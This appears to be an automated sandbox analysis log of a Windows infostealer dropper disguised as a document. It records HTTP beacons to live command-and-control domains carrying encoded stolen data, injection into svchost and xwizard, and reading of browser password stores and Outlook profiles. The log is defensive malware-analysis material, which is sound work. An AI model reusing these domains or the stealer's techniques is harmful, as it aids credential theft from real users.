            Source: unknownHTTP traffic detected: POST /z4qr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Length: 199Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheHost: www.thesnusgang.funOrigin: http://www.thesnusgang.funReferer: http://www.thesnusgang.fun/z4qr/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0Data Raw: 51 54 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 6d 6e 45 77 69 73 42 61 63 67 36 48 77 33 34 70 54 66 58 75 2b 4e 44 59 58 37 50 66 6a 38 53 5a 41 3d 3d Data Ascii: QT=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYmnEwisBacg6Hw34pTfXu+NDYX7Pfj8SZA==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 17:48:27 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "674427dd-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:48:57 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nw9AzNricR9S9HnW0Vp2n74qEIfLP4sy8XcFWeC5DG27sL4iTUYIiXNt9XAICejIs6nTp8jfHMlU7iotzNcDkYJKrt0Y1bhoeqtsl58du%2FENfhg0NPXWk8eGJYrJzDB3QlGS"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8eff119ad837ebbd-YYZ
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=143156&min_rtt=143156&rtt_var=71578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:00 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3pm5Y0CHbBeIGgtWgHYDtlH720KCwconnEncyLjZHcqIbinvD7zmNbOpDrALMyLTRlXYf2perzsnXdrdq1DACbBz9Ty0zd93zwC%2BBE53uG1kYI8Rw%2FdnYxYlFWOKUj2OvSA"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8eff11acded5d755-NRT
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=277463&min_rtt=277463&rtt_var=138731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=725&delivery_rate=0&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:03 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjbblhRlSXwaxKyCABD1MxWA%2FCC%2B7w%2BR9%2FGXd4NbKs%2BrjiKy162%2FdBoUSm7uWKmt5jeKXEPLJigHMHox0Kra498nLInCTks4dp3pdPD2FldTTXQ6Pzw%2FNwxFV1V%2BAF11Vf8B"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8eff11bd2bd4a24a-YYZ
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=142822&min_rtt=142822&rtt_var=71411&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7874&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:06 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clEowAA6yD3UC5pVr53RZJzp%2F9U8AwE0MIOttb6%2BJ291iABAoFtw4sXjXr%2FhymTjtdiCo%2FNfBcbBod8JelC%2FP8%2F6BFjT3A5q%2BLbxmslRgQH4%2FM8Q9QarMlQqgrJv9VDRvfLU"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8eff11ce49d06ac1-SEA
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=182025&min_rtt=182025&rtt_var=91012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:38 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:41 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:44 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 17:49:46 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: EIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.freshteps.life
            Source: EIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.freshteps.life/qp01/
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: X0a-0531.4.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: X0a-0531.4.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.000000000301D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
            Source: xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003008000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: xwizard.exe, 00000004.00000003.64411163696.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: xwizard.exe, 00000004.00000002.65195625577.0000000005FEC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196526701.0000000007D20000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65195625577.0000000005E5A000.00000004.10000000.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match | File source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000000.63929637279.0000000000544000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000000.63929637279.0000000000544000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63942162359.0000000003EE3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945428581.00000000040DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@8/5
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | File created: C:\Users\user\AppData\Local\Temp\aut8413.tmp
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: xwizard.exe, 00000004.00000002.65196596495.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
            Source: xwizard.exe, 00000004.00000003.64412184304.0000000003022000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008030000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196596495.000000000803C000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | ReversingLabs: Detection: 27%
            Source: unknown | Process created: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\xwizard.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static file information: File size 1179648 > 1048576
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EIyKLgVzlk.exe, 00000003.00000002.65192008768.000000000028E000.00000002.00000001.01000000.00000004.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65192012128.000000000028E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
